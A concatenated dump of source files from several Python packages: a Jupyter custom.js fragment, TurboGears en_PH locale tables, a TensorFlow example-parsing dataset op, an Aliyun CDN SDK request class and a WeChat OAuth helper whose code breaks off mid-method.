* define([
* 'base/js/events'
* ], function(events) {
* events.on('app_initialized.DashboardApp', function(){
* requirejs(['custom/unofficial_extension.js'])
* });
* });
*
*
*
* @module IPython
* @namespace IPython
* @class customjs
* @static
*/ | PypiClean |
/TurboGears-1.5.1.tar.gz/TurboGears-1.5.1/turbogears/i18n/data/en_PH.py |
languages={'gv': 'Manx', 'gu': 'Gujarati', 'rom': 'Romany', 'alg': 'Algonquian Languages', 'ale': 'Aleut', 'sco': 'Scots', 'mni': 'Manipuri', 'gd': 'Scottish Gaelic', 'ga': 'Irish', 'mno': 'Manobo Languages', 'osa': 'Osage', 'gn': 'Guarani', 'gl': 'Gallegan', 'mwr': 'Marwari', 'ty': 'Tahitian', 'tw': 'Twi', 'tt': 'Tatar', 'tr': 'Turkish', 'ts': 'Tsonga', 'tn': 'Tswana', 'to': 'Tonga (Tonga Islands)', 'aus': 'Australian Languages', 'av': 'Avaric', 'tk': 'Turkmen', 'th': 'Thai', 'roa': 'Romance (Other)', 'tg': 'Tajik', 'te': 'Telugu', 'uga': 'Ugaritic', 'ta': 'Tamil', 'fat': 'Fanti', 'fan': 'Fang', 'wo': 'Wolof', 'rm': 'Rhaeto-Romance', 'din': 'Dinka', 'bla': 'Siksika', 'cmc': 'Chamic Languages', 'ml': 'Malayalam', 'zh': 'Chinese', 'tem': 'Timne', 'za': 'Zhuang', 'cau': 'Caucasian (Other)', 'zu': 'Zulu', 'ter': 'Tereno', 'tet': 'Tetum', 'mnc': 'Manchu', 'kut': 'Kutenai', 'suk': 'Sukuma', 'kum': 'Kumyk', 'sus': 'Susu', 'new': 'Newari', 'sux': 'Sumerian', 'den': 'Slave', 'men': 'Mende', 'mul': 'Multiple Languages', 'lez': 'Lezghian', 'root': 'Root', 'eka': 'Ekajuk', 'akk': 'Akkadian', 'dra': 'Dravidian (Other)', 'jrb': 'Judeo-Arabic', 'sgn': 'Sign Languages', 'sga': 'Irish, Old (to 900)', 'apa': 'Apache Languages', 'bra': 'Braj', 'chb': 'Chibcha', 'chg': 'Chagatai', 'chk': 'Chuukese', 'chm': 'Mari', 'chn': 'Chinook Jargon', 'cho': 'Choctaw', 'chp': 'Chipewyan', 'chr': 'Cherokee', 'chy': 'Cheyenne', 'ti': 'Tigrinya', 'vot': 'Votic', 'mg': 'Malagasy', 'iba': 'Iban', 'mo': 'Moldavian', 'mn': 'Mongolian', 'mi': 'Maori', 'mh': 'Marshallese', 'mk': 'Macedonian', 'mt': 'Maltese', 'cai': 'Central American Indian (Other)', 'del': 'Delaware', 'ms': 'Malay', 'mr': 'Marathi', 'my': 'Burmese', 'cad': 'Caddo', 'tai': 'Tai (Other)', 'afh': 'Afrihili', 'sit': 'Sino-Tibetan (Other)', 'enm': 'English, Middle (1100-1500)', 'csb': 'Kashubian', 'nyn': 'Nyankole', 'nyo': 'Nyoro', 'nym': 'Nyamwezi', 'sio': 'Siouan Languages', 'map': 'Austronesian', 'mas': 'Masai', 'lah': 'Lahnda', 'lad': 'Ladino', 'fy': 'Frisian', 'snk': 'Soninke', 'fa': 'Persian', 'mad': 'Madurese', 'mag': 'Magahi', 'mai': 'Maithili', 'fi': 'Finnish', 'fj': 'Fijian', 'man': 'Mandingo', 'egy': 'Egyptian (Ancient)', 'znd': 'Zande', 'ss': 'Swati', 'sr': 'Serbian', 'sq': 'Albanian', 'sw': 'Swahili', 'sv': 'Swedish', 'su': 'Sundanese', 'st': 'Sotho, Southern', 'sk': 'Slovak', 'si': 'Sinhalese', 'sh': 'Serbo-Croatian', 'so': 'Somali', 'sn': 'Shona', 'sm': 'Samoan', 'sl': 'Slovenian', 'sc': 'Sardinian', 'sa': 'Sanskrit', 'sg': 'Sango', 'se': 'Northern Sami', 'sd': 'Sindhi', 'zen': 'Zenaga', 'kbd': 'Kabardian', 'afa': 'Afro-Asiatic (Other)', 'lg': 'Ganda', 'lb': 'Luxembourgish', 'fiu': 'Finno - Ugrian (Other)', 'ln': 'Lingala', 'lo': 'Lao', 'li': 'Limburgish', 'byn': 'Blin', 'lt': 'Lithuanian', 'lu': 'Luba-Katanga', 'yi': 'Yiddish', 'non': 'Norse, Old', 'ceb': 'Cebuano', 'yo': 'Yoruba', 'nog': 'Nogai', 'bat': 'Baltic (Other)', 'dak': 'Dakota', 'dar': 'Dargwa', 'day': 'Dayak', 'ssa': 'Nilo-Saharam (Other)', 'kpe': 'Kpelle', 'el': 'Greek', 'eo': 'Esperanto', 'en': 'English', 'lam': 'Lamba', 'ee': 'Ewe', 'mdf': 'Moksha', 'fr': 'French', 'mdr': 'Mandar', 'et': 'Estonian', 'es': 'Spanish', 'ru': 'Russian', 'gon': 'Gondi', 'goh': 'German, Old High (ca.750-1050)', 'sms': 'Skolt Sami', 'smn': 'Inari Sami', 'smj': 'Lule Sami', 'smi': 'Sami languages (Other)', 'got': 'Gothic', 'rn': 'Rundi', 'ro': 'Romanian', 'dsb': 'Lower Sorbian', 'sma': 'Southern Sami', 'gor': 'Gorontalo', 'ast': 'Asturian', 'wal': 'Walamo', 'crh': 'Crimean Turkish; Crimean Tatar', 'ath': 
'Athapascan Languages', 'gez': 'Geez', 'xh': 'Xhosa', 'ff': 'Fulah', 'mak': 'Makasar', 'zap': 'Zapotec', 'kok': 'Konkani', 'kos': 'Kosraean', 'fo': 'Faroese', 'tog': 'Tonga (Nyasa)', 'hup': 'Hupa', 'udm': 'Udmurt', 'bej': 'Beja', 'bem': 'Bemba', 'tsi': 'Tsimshian', 'ber': 'Berber', 'nzi': 'Nzima', 'sai': 'South American Indian (Other)', 'ang': 'English, Old (ca.450-1100)', 'pra': 'Prakrit Languages', 'bho': 'Bhojpuri', 'sal': 'Salishan languages', 'pro': u'Proven\xe7al, Old (to 1500)', 'raj': 'Rajasthani', 'sad': 'Sandawe', 'rar': 'Rarotongan', 'rap': 'Rapanui', 'sas': 'Sasak', 'car': 'Carib', 'min': 'Minangkabau', 'mic': 'Micmac', 'efi': 'Efik', 'arn': 'Araucanian', 'ypk': 'Yupik Languages', 'mis': 'Miscellaneous Languages', 'kac': 'Kachin', 'kab': 'Kabyle', 'kaa': 'Kara-Kalpak', 'kam': 'Kamba', 'kar': 'Karen', 'kaw': 'Kawi', 'tyv': 'Tuvinian', 'awa': 'Awadhi', 'ka': 'Georgian', 'doi': 'Dogri', 'kg': 'Kongo', 'kk': 'Kazakh', 'kj': 'Kuanyama', 'ki': 'Kikuyu', 'ko': 'Korean', 'kn': 'Kannada', 'km': 'Khmer', 'kl': 'Kalaallisut', 'ks': 'Kashmiri', 'kr': 'Kanuri', 'kw': 'Cornish', 'kv': 'Komi', 'ku': 'Kurdish', 'ky': 'Kirghiz', 'tkl': 'Tokelau', 'bua': 'Buriat', 'mga': 'Irish, Middle (900-1200)', 'hit': 'Hittite', 'dyu': 'Dyula', 'de': 'German', 'da': 'Danish', 'dz': 'Dzongkha', 'ira': 'Iranian', 'dv': 'Divehi', 'hil': 'Hiligaynon', 'him': 'Himachali', 'gem': 'Germanic (Other)', 'crp': 'Creoles and Pidgins (Other)', 'qu': 'Quechua', 'bas': 'Basa', 'gba': 'Gbaya', 'bad': 'Banda', 'ban': 'Balinese', 'bal': 'Baluchi', 'bam': 'Bambara', 'shn': 'Shan', 'bai': 'Bamileke Languages', 'arp': 'Arapaho', 'art': 'Artificial (Other)', 'arw': 'Arawak', 'arc': 'Aramaic', 'sem': 'Semitic (Other)', 'sel': 'Selkup', 'nub': 'Nubian Languages', 'btk': 'Batak', 'lus': 'Lushai', 'mus': 'Creek', 'lua': 'Luba-Lulua', 'iro': 'Iroquoian languages', 'lui': 'Luiseno', 'mun': 'Munda Languages', 'lun': 'Lunda', 'luo': 'Luo', 'wa': 'Walloon', 'tup': 'Tupi languages', 'jv': 'Javanese', 'tut': 'Altaic (Other)', 'tum': 'Tumbuka', 'ja': 'Japanese', 'cop': 'Coptic', 'ilo': 'Iloko', 'la': 'Latin', 'gwi': "Gwich'in", 'und': 'Undetermined', 'tli': 'Tlingit', 'ch': 'Chamorro', 'co': 'Corsican', 'ca': 'Catalan', 'ce': 'Chechen', 'pon': 'Pohnpeian', 'cy': 'Welsh', 'sah': 'Yakut', 'cs': 'Czech', 'cr': 'Cree', 'bnt': 'Bantu', 'cv': 'Chuvash', 'cu': 'Church Slavic', 'lv': 'Latvian', 'dum': 'Dutch, Middle (ca. 
1050-1350)', 'pt': 'Portuguese', 'dua': 'Duala', 'fro': 'French, Old (842-ca.1400)', 'yap': 'Yapese', 'frm': 'French, Middle (ca.1400-1600)', 'tiv': 'Tiv', 'yao': 'Yao', 'pa': 'Punjabi', 'xal': 'Kalmyk', 'pi': 'Pali', 'pl': 'Polish', 'gay': 'Gayo', 'oto': 'Otomian Languages', 'ota': 'Turkish, Ottoman (1500-1928)', 'hmn': 'Hmong', 'an': 'Aragonese', 'gaa': 'Ga', 'fur': 'Friulian', 'khi': 'Khoisan (Other)', 'sla': 'Slavic (Other)', 've': 'Venda', 'vi': 'Vietnamese', 'is': 'Icelandic', 'kho': 'Khotanese', 'iu': 'Inuktitut', 'it': 'Italian', 'vo': u'Volap\xfck', 'ii': 'Sichuan Yi', 'ik': 'Inupiaq', 'io': 'Ido', 'ine': 'Indo-European (Other)', 'ia': 'Interlingua', 'jpr': 'Judeo-Persian', 'ie': 'Interlingue', 'id': 'Indonesian', 'ig': 'Igbo', 'pap': 'Papiamento', 'ewo': 'Ewondo', 'pau': 'Palauan', 'paa': 'Papuan (Other)', 'pag': 'Pangasinan', 'sat': 'Santali', 'pal': 'Pahlavi', 'pam': 'Pampanga', 'phi': 'Philippine (Other)', 'cel': 'Celtic (Other)', 'phn': 'Phoenician', 'nic': 'Niger - Kordofanian (Other)', 'nia': 'Nias', 'dgr': 'Dogrib', 'syr': 'Syriac', 'niu': 'Niuean', 'jbo': 'Lojban', 'nah': 'Nahuatl', 'sam': 'Samaritan Aramaic', 'hai': 'Haida', 'gmh': 'German, Middle High (ca.1050-1500)', 'cus': 'Cushitic (Other)', 'wen': 'Sorbian Languages', 'ady': 'Adyghe', 'elx': 'Elamite', 'ada': 'Adangme', 'haw': 'Hawaiian', 'bin': 'Bini', 'bik': 'Bikol', 'mos': 'Mossi', 'moh': 'Mohawk', 'tl': 'Tagalog', 'tvl': 'Tuvalu', 'ijo': 'Ijo', 'kmb': 'Kimbundu', 'peo': 'Persian Old (ca.600-400 B.C.)', 'umb': 'Umbundu', 'tmh': 'Tamashek', 'fon': 'Fon', 'hsb': 'Upper Sorbian', 'be': 'Belarusian', 'bg': 'Bulgarian', 'ba': 'Bashkir', 'ps': 'Pashto (Pushto)', 'bm': 'Bambara', 'bn': 'Bengali', 'bo': 'Tibetan', 'bh': 'Bihari', 'bi': 'Bislama', 'br': 'Breton', 'bs': 'Bosnian', 'om': 'Oromo', 'oj': 'Ojibwa', 'ace': 'Achinese', 'ach': 'Acoli', 'oc': u'Occitan (post 1500); Proven\xe7al', 'kru': 'Kurukh', 'srr': 'Serer', 'kro': 'Kru', 'krc': 'Karachay-Balkar', 'nds': 'Low German; Low Saxon', 'os': 'Ossetic', 'or': 'Oriya', 'sog': 'Sogdien', 'nso': 'Sotho, Northern', 'son': 'Songhai', 'vai': 'Vai', 'wak': 'Wakashan Languages', 'lol': 'Mongo', 'mkh': 'Mon-Khmer (Other)', 'loz': 'Lozi', 'gil': 'Gilbertese', 'was': 'Washo', 'war': 'Waray', 'hz': 'Herero', 'hy': 'Armenian', 'sid': 'Sidamo', 'hr': 'Croatian', 'ht': 'Haitian', 'hu': 'Hungarian', 'hi': 'Hindi', 'ho': 'Hiri Motu', 'ha': 'Hausa', 'bug': 'Buginese', 'he': 'Hebrew', 'uz': 'Uzbek', 'ur': 'Urdu', 'uk': 'Ukrainian', 'ug': 'Uighur', 'aa': 'Afar', 'ab': 'Abkhazian', 'ae': 'Avestan', 'af': 'Afrikaans', 'ak': 'Akan', 'am': 'Amharic', 'myv': 'Erzya', 'eu': 'Basque', 'as': 'Assamese', 'ar': 'Arabic', 'inh': 'Ingush', 'tpi': 'Tok Pisin', 'myn': 'Mayan', 'ay': 'Aymara', 'kha': 'Khasi', 'az': 'Azerbaijani', 'inc': 'Indic (Other)', 'nl': 'Dutch', 'nn': 'Norwegian Nynorsk', 'no': 'Norwegian', 'na': 'Nauru', 'nb': u'Norwegian Bokm\xe5l', 'nai': 'North American Indian (Other)', 'nd': 'Ndebele, North', 'ne': 'Nepali', 'ng': 'Ndonga', 'ny': 'Nyanja; Chichewa; Chewa', 'nap': 'Neapolitan', 'grb': 'Gerbo', 'grc': 'Greek, Ancient (to 1453)', 'nr': 'Ndebele, South', 'tig': 'Tigre', 'nv': 'Navajo', 'zun': 'Zuni', 'rw': 'Kinyarwanda', 'cpe': 'Creoles and Pidgins, English-based (Other)', 'cpf': 'Creoles and Pidgins, French-based (Other)', 'cpp': 'Creoles and pidgins, Portuguese-based (Other)'}
countries={'BD': 'Bangladesh', 'BE': 'Belgium', 'BF': 'Burkina Faso', 'BG': 'Bulgaria', 'BA': 'Bosnia and Herzegovina', 'BB': 'Barbados', 'WF': 'Wallis and Futuna', 'BM': 'Bermuda', 'BN': 'Brunei', 'BO': 'Bolivia', 'BH': 'Bahrain', 'BI': 'Burundi', 'BJ': 'Benin', 'BT': 'Bhutan', 'JM': 'Jamaica', 'BV': 'Bouvet Island', 'BW': 'Botswana', 'WS': 'Samoa', 'BR': 'Brazil', 'BS': 'Bahamas', 'BY': 'Belarus', 'BZ': 'Belize', 'RU': 'Russia', 'RW': 'Rwanda', 'TL': 'Timor-Leste', 'RE': u'R\xe9union', 'TM': 'Turkmenistan', 'TJ': 'Tajikistan', 'RO': 'Romania', 'TK': 'Tokelau', 'GW': 'Guinea-Bissau', 'GU': 'Guam', 'GT': 'Guatemala', 'GS': 'South Georgia and South Sandwich Islands', 'GR': 'Greece', 'GQ': 'Equatorial Guinea', 'GP': 'Guadeloupe', 'JP': 'Japan', 'GY': 'Guyana', 'GF': 'French Guiana', 'GE': 'Georgia', 'GD': 'Grenada', 'GB': 'United Kingdom', 'GA': 'Gabon', 'SV': 'El Salvador', 'GN': 'Guinea', 'GM': 'Gambia', 'GL': 'Greenland', 'GI': 'Gibraltar', 'GH': 'Ghana', 'OM': 'Oman', 'TN': 'Tunisia', 'JO': 'Jordan', 'SP': 'Serbia', 'HR': 'Croatia', 'HT': 'Haiti', 'HU': 'Hungary', 'HK': 'Hong Kong S.A.R., China', 'HN': 'Honduras', 'HM': 'Heard Island and McDonald Islands', 'VE': 'Venezuela', 'PR': 'Puerto Rico', 'PS': 'Palestinian Territory', 'PW': 'Palau', 'PT': 'Portugal', 'SJ': 'Svalbard and Jan Mayen', 'PY': 'Paraguay', 'IQ': 'Iraq', 'PA': 'Panama', 'PF': 'French Polynesia', 'PG': 'Papua New Guinea', 'PE': 'Peru', 'PK': 'Pakistan', 'PH': 'Philippines', 'PN': 'Pitcairn', 'PL': 'Poland', 'PM': 'Saint Pierre and Miquelon', 'ZM': 'Zambia', 'EH': 'Western Sahara', 'EE': 'Estonia', 'EG': 'Egypt', 'ZA': 'South Africa', 'EC': 'Ecuador', 'IT': 'Italy', 'VN': 'Vietnam', 'SB': 'Solomon Islands', 'ET': 'Ethiopia', 'SO': 'Somalia', 'ZW': 'Zimbabwe', 'SA': 'Saudi Arabia', 'ES': 'Spain', 'ER': 'Eritrea', 'MD': 'Moldova', 'MG': 'Madagascar', 'MA': 'Morocco', 'MC': 'Monaco', 'UZ': 'Uzbekistan', 'MM': 'Myanmar', 'ML': 'Mali', 'MO': 'Macao S.A.R. 
China', 'MN': 'Mongolia', 'MH': 'Marshall Islands', 'MK': 'Macedonia', 'MU': 'Mauritius', 'MT': 'Malta', 'MW': 'Malawi', 'MV': 'Maldives', 'MQ': 'Martinique', 'MP': 'Northern Mariana Islands', 'MS': 'Montserrat', 'MR': 'Mauritania', 'UG': 'Uganda', 'MY': 'Malaysia', 'MX': 'Mexico', 'IL': 'Israel', 'FR': 'France', 'IO': 'British Indian Ocean Territory', 'SH': 'Saint Helena', 'FI': 'Finland', 'FJ': 'Fiji', 'FK': 'Falkland Islands', 'FM': 'Micronesia', 'FO': 'Faroe Islands', 'NI': 'Nicaragua', 'NL': 'Netherlands', 'NO': 'Norway', 'NA': 'Namibia', 'VU': 'Vanuatu', 'NC': 'New Caledonia', 'NE': 'Niger', 'NF': 'Norfolk Island', 'NG': 'Nigeria', 'NZ': 'New Zealand', 'NP': 'Nepal', 'NR': 'Nauru', 'NU': 'Niue', 'CK': 'Cook Islands', 'CI': u"C\xf4te d'Ivoire", 'CH': 'Switzerland', 'CO': 'Colombia', 'CN': 'China', 'CM': 'Cameroon', 'CL': 'Chile', 'CC': 'Cocos Islands', 'CA': 'Canada', 'CG': 'Congo', 'CF': 'Central African Republic', 'CD': 'Democratic Republic of the Congo', 'CZ': 'Czech Republic', 'CY': 'Cyprus', 'CX': 'Christmas Island', 'CR': 'Costa Rica', 'CV': 'Cape Verde', 'CU': 'Cuba', 'SZ': 'Swaziland', 'SY': 'Syria', 'KG': 'Kyrgyzstan', 'KE': 'Kenya', 'SR': 'Suriname', 'KI': 'Kiribati', 'KH': 'Cambodia', 'KN': 'Saint Kitts and Nevis', 'KM': 'Comoros', 'ST': 'Sao Tome and Principe', 'SK': 'Slovakia', 'KR': 'South Korea', 'SI': 'Slovenia', 'KP': 'North Korea', 'KW': 'Kuwait', 'SN': 'Senegal', 'SM': 'San Marino', 'SL': 'Sierra Leone', 'SC': 'Seychelles', 'KZ': 'Kazakhstan', 'KY': 'Cayman Islands', 'SG': 'Singapore', 'SE': 'Sweden', 'SD': 'Sudan', 'DO': 'Dominican Republic', 'DM': 'Dominica', 'DJ': 'Djibouti', 'DK': 'Denmark', 'VG': 'British Virgin Islands', 'DE': 'Germany', 'YE': 'Yemen', 'DZ': 'Algeria', 'US': 'United States', 'UY': 'Uruguay', 'YU': 'Yugoslavia', 'YT': 'Mayotte', 'UM': 'United States Minor Outlying Islands', 'LB': 'Lebanon', 'LC': 'Saint Lucia', 'LA': 'Laos', 'TV': 'Tuvalu', 'TW': 'Taiwan', 'TT': 'Trinidad and Tobago', 'TR': 'Turkey', 'LK': 'Sri Lanka', 'LI': 'Liechtenstein', 'LV': 'Latvia', 'TO': 'Tonga', 'LT': 'Lithuania', 'LU': 'Luxembourg', 'LR': 'Liberia', 'LS': 'Lesotho', 'TH': 'Thailand', 'TF': 'French Southern Territories', 'TG': 'Togo', 'TD': 'Chad', 'TC': 'Turks and Caicos Islands', 'LY': 'Libya', 'VA': 'Vatican', 'VC': 'Saint Vincent and the Grenadines', 'AE': 'United Arab Emirates', 'AD': 'Andorra', 'AG': 'Antigua and Barbuda', 'AF': 'Afghanistan', 'AI': 'Anguilla', 'VI': 'U.S. Virgin Islands', 'IS': 'Iceland', 'IR': 'Iran', 'AM': 'Armenia', 'AL': 'Albania', 'AO': 'Angola', 'AN': 'Netherlands Antilles', 'AQ': 'Antarctica', 'AS': 'American Samoa', 'AR': 'Argentina', 'AU': 'Australia', 'AT': 'Austria', 'AW': 'Aruba', 'IN': 'India', 'TZ': 'Tanzania', 'AZ': 'Azerbaijan', 'IE': 'Ireland', 'ID': 'Indonesia', 'UA': 'Ukraine', 'QA': 'Qatar', 'MZ': 'Mozambique'}
months=['January', 'February', 'March', 'April', 'May', 'June', 'July', 'August', 'September', 'October', 'November', 'December']
abbrMonths=['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec']
days=['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday']
abbrDays=['Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun']
dateFormats={'medium': '%m %d, %y', 'full': '%%(dayname)s, %%(monthname)s %d, %Y', 'long': '%%(monthname)s %d, %Y', 'short': '%m/%d/%y'}
numericSymbols={'group': ',', 'nativeZeroDigit': '0', 'exponential': 'E', 'perMille': u'\u2030', 'nan': u'\ufffd', 'decimal': '.', 'percentSign': '%', 'list': ';', 'patternDigit': '#', 'plusSign': '+', 'infinity': u'\u221e', 'minusSign': '-'} | PypiClean |
/tensorflow_directml-1.15.8-cp37-cp37m-win_amd64.whl/tensorflow_core/python/data/experimental/ops/parsing_ops.py | """Experimental `dataset` API for parsing example."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.data.util import structure
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_spec
from tensorflow.python.ops import gen_experimental_dataset_ops
from tensorflow.python.ops import parsing_ops
from tensorflow.python.util.tf_export import tf_export
class _ParseExampleDataset(dataset_ops.UnaryDataset):
"""A `Dataset` that parses `example` dataset into a `dict` dataset."""
def __init__(self, input_dataset, features, num_parallel_calls):
self._input_dataset = input_dataset
if not structure.are_compatible(
input_dataset.element_spec,
tensor_spec.TensorSpec([None], dtypes.string)):
raise TypeError("Input dataset should be a dataset of vectors of strings")
self._num_parallel_calls = num_parallel_calls
# pylint: disable=protected-access
self._features = parsing_ops._prepend_none_dimension(features)
# sparse_keys and dense_keys come back sorted here.
(sparse_keys, sparse_types, dense_keys, dense_types, dense_defaults,
dense_shapes) = parsing_ops._features_to_raw_params(
self._features, [
parsing_ops.VarLenFeature, parsing_ops.SparseFeature,
parsing_ops.FixedLenFeature, parsing_ops.FixedLenSequenceFeature
])
# TODO(b/112859642): Pass sparse_index and sparse_values for SparseFeature.
(_, dense_defaults_vec, sparse_keys, sparse_types, dense_keys, dense_shapes,
dense_shape_as_shape) = parsing_ops._process_raw_parameters(
None, dense_defaults, sparse_keys, sparse_types, dense_keys,
dense_types, dense_shapes)
# pylint: enable=protected-access
self._sparse_keys = sparse_keys
self._sparse_types = sparse_types
self._dense_keys = dense_keys
self._dense_defaults = dense_defaults_vec
self._dense_shapes = dense_shapes
self._dense_types = dense_types
input_dataset_shape = dataset_ops.get_legacy_output_shapes(
self._input_dataset)
dense_output_shapes = [input_dataset_shape.concatenate(shape)
for shape in dense_shape_as_shape]
sparse_output_shapes = [input_dataset_shape.concatenate([None])
for _ in range(len(sparse_keys))]
output_shapes = dict(
zip(self._dense_keys + self._sparse_keys,
dense_output_shapes + sparse_output_shapes))
output_types = dict(
zip(self._dense_keys + self._sparse_keys,
self._dense_types + self._sparse_types))
output_classes = dict(
zip(self._dense_keys + self._sparse_keys,
[ops.Tensor for _ in range(len(self._dense_defaults))] +
[sparse_tensor.SparseTensor for _ in range(len(self._sparse_keys))
]))
self._element_spec = structure.convert_legacy_structure(
output_types, output_shapes, output_classes)
variant_tensor = (
gen_experimental_dataset_ops.parse_example_dataset(
self._input_dataset._variant_tensor, # pylint: disable=protected-access
self._num_parallel_calls,
self._dense_defaults,
self._sparse_keys,
self._dense_keys,
self._sparse_types,
self._dense_shapes,
**self._flat_structure))
super(_ParseExampleDataset, self).__init__(input_dataset, variant_tensor)
@property
def element_spec(self):
return self._element_spec
# TODO(b/111553342): add arguments names and example names as well.
@tf_export("data.experimental.parse_example_dataset")
def parse_example_dataset(features, num_parallel_calls=1):
"""A transformation that parses `Example` protos into a `dict` of tensors.
Parses a number of serialized `Example` protos given in `serialized`. We refer
to `serialized` as a batch with `batch_size` many entries of individual
`Example` protos.
This op parses serialized examples into a dictionary mapping keys to `Tensor`
and `SparseTensor` objects. `features` is a dict from keys to `VarLenFeature`,
`SparseFeature`, and `FixedLenFeature` objects. Each `VarLenFeature`
and `SparseFeature` is mapped to a `SparseTensor`, and each
`FixedLenFeature` is mapped to a `Tensor`. See `tf.io.parse_example` for more
details about feature dictionaries.
Args:
features: A `dict` mapping feature keys to `FixedLenFeature`,
`VarLenFeature`, and `SparseFeature` values.
num_parallel_calls: (Optional.) A `tf.int32` scalar `tf.Tensor`,
representing the number of parsing processes to call in parallel.
Returns:
A dataset transformation function, which can be passed to
`tf.data.Dataset.apply`.
Raises:
ValueError: if features argument is None.
"""
if features is None:
raise ValueError("Missing: features was %s." % features)
def _apply_fn(dataset):
"""Function from `Dataset` to `Dataset` that applies the transformation."""
out_dataset = _ParseExampleDataset(dataset, features, num_parallel_calls)
if any(
isinstance(feature, parsing_ops.SparseFeature)
for _, feature in features.items()
):
# pylint: disable=protected-access
# pylint: disable=g-long-lambda
out_dataset = out_dataset.map(
lambda x: parsing_ops._construct_sparse_tensors_for_sparse_features(
features, x), num_parallel_calls=num_parallel_calls)
return out_dataset
return _apply_fn | PypiClean |
/aliyun-python-sdk-cdn-3.8.8.tar.gz/aliyun-python-sdk-cdn-3.8.8/aliyunsdkcdn/request/v20180510/AddCdnDomainRequest.py |
from aliyunsdkcore.request import RpcRequest
from aliyunsdkcdn.endpoint import endpoint_data
class AddCdnDomainRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'Cdn', '2018-05-10', 'AddCdnDomain')
self.set_method('POST')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_Sources(self): # String
return self.get_query_params().get('Sources')
def set_Sources(self, Sources): # String
self.add_query_param('Sources', Sources)
def get_ResourceGroupId(self): # String
return self.get_query_params().get('ResourceGroupId')
def set_ResourceGroupId(self, ResourceGroupId): # String
self.add_query_param('ResourceGroupId', ResourceGroupId)
def get_SecurityToken(self): # String
return self.get_query_params().get('SecurityToken')
def set_SecurityToken(self, SecurityToken): # String
self.add_query_param('SecurityToken', SecurityToken)
def get_CdnType(self): # String
return self.get_query_params().get('CdnType')
def set_CdnType(self, CdnType): # String
self.add_query_param('CdnType', CdnType)
def get_Scope(self): # String
return self.get_query_params().get('Scope')
def set_Scope(self, Scope): # String
self.add_query_param('Scope', Scope)
def get_Tags(self): # RepeatList
return self.get_query_params().get('Tag')
def set_Tags(self, Tag): # RepeatList
for depth1 in range(len(Tag)):
if Tag[depth1].get('Value') is not None:
self.add_query_param('Tag.' + str(depth1 + 1) + '.Value', Tag[depth1].get('Value'))
if Tag[depth1].get('Key') is not None:
self.add_query_param('Tag.' + str(depth1 + 1) + '.Key', Tag[depth1].get('Key'))
def get_TopLevelDomain(self): # String
return self.get_query_params().get('TopLevelDomain')
def set_TopLevelDomain(self, TopLevelDomain): # String
self.add_query_param('TopLevelDomain', TopLevelDomain)
def get_OwnerAccount(self): # String
return self.get_query_params().get('OwnerAccount')
def set_OwnerAccount(self, OwnerAccount): # String
self.add_query_param('OwnerAccount', OwnerAccount)
def get_DomainName(self): # String
return self.get_query_params().get('DomainName')
def set_DomainName(self, DomainName): # String
self.add_query_param('DomainName', DomainName)
def get_OwnerId(self): # Long
return self.get_query_params().get('OwnerId')
def set_OwnerId(self, OwnerId): # Long
self.add_query_param('OwnerId', OwnerId)
def get_CheckUrl(self): # String
return self.get_query_params().get('CheckUrl')
def set_CheckUrl(self, CheckUrl): # String
self.add_query_param('CheckUrl', CheckUrl) | PypiClean |
/pywe-oauth-1.1.2.tar.gz/pywe-oauth-1.1.2/pywe_oauth/oauth.py |
import shortuuid
from pywe_base import BaseWechat
from six.moves import urllib_parse
class Oauth(BaseWechat):
def __init__(self):
super(Oauth, self).__init__()
        # Obtain basic user info via web-page authorization, Refer: http://mp.weixin.qq.com/wiki/17/c0f37d5704f0b64713d5d2c37b468d75.html
        # WeChat login development guide for mobile apps, Refer: https://open.weixin.qq.com/cgi-bin/showdocument?action=dir_list&t=resource/res_list&verify=1&id=open1419317851&token=&lang=zh_CN
self.WECHAT_OAUTH2_AUTHORIZE = self.OPEN_DOMAIN + '/connect/oauth2/authorize?appid={appid}&redirect_uri={redirect_uri}&response_type=code&scope={scope}&state={state}&forcePopup={forcePopup}#wechat_redirect'
self.WECHAT_OAUTH2_ACCESS_TOKEN = self.API_DOMAIN + '/sns/oauth2/access_token?appid={appid}&secret={secret}&code={code}&grant_type=authorization_code'
self.WECHAT_OAUTH2_USERINFO = self.API_DOMAIN + '/sns/userinfo?access_token={access_token}&openid={openid}'
        # Third-party platform initiates web-page authorization on behalf of an Official Account, https://open.weixin.qq.com/cgi-bin/showdocument?action=dir_list&t=resource/res_list&verify=1&id=open1419318590&token=&lang=zh_CN
self.WECHAT_COMPONENT_OAUTH2_AUTHORIZE = self.OPEN_DOMAIN + '/connect/oauth2/authorize?appid={appid}&redirect_uri={redirect_uri}&response_type=code&scope={scope}&state={state}&component_appid={component_appid}#wechat_redirect'
self.WECHAT_COMPONENT_OAUTH2_ACCESS_TOKEN = self.API_DOMAIN + '/sns/oauth2/component/access_token?appid={appid}&code={code}&grant_type=authorization_code&component_appid={component_appid}&component_access_token={component_access_token}'
self.WECHAT_COMPONENT_OAUTH2_USERINFO = self.API_DOMAIN + '/sns/userinfo?access_token={access_token}&openid={openid}&lang=zh_CN'
def get_oauth_code_url(self, appid=None, redirect_uri=None, scope='snsapi_base', redirect_url=None, component=False, component_appid=None, force_popup=False):
if component:
return self.get_component_oauth_code_url(appid=appid, redirect_uri=redirect_uri, scope=scope, redirect_url=redirect_url, component_appid=component_appid)
return self.WECHAT_OAUTH2_AUTHORIZE.format(
appid=appid,
redirect_uri=urllib_parse.quote_plus(redirect_uri),
scope=scope,
state=urllib_parse.quote_plus(redirect_url),
forcePopup='true' if force_popup else 'false',
)
def get_access_info(self, appid=None, secret=None, code=None, component=False, component_appid=None, component_access_token=None):
if component:
return self.get_component_access_info(appid=appid, code=code, component_appid=component_appid, component_access_token=component_access_token)
return self.get(self.WECHAT_OAUTH2_ACCESS_TOKEN, appid=appid, secret=secret, code=code)
def get_userinfo(self, access_token=None, openid=None, component=False):
if component:
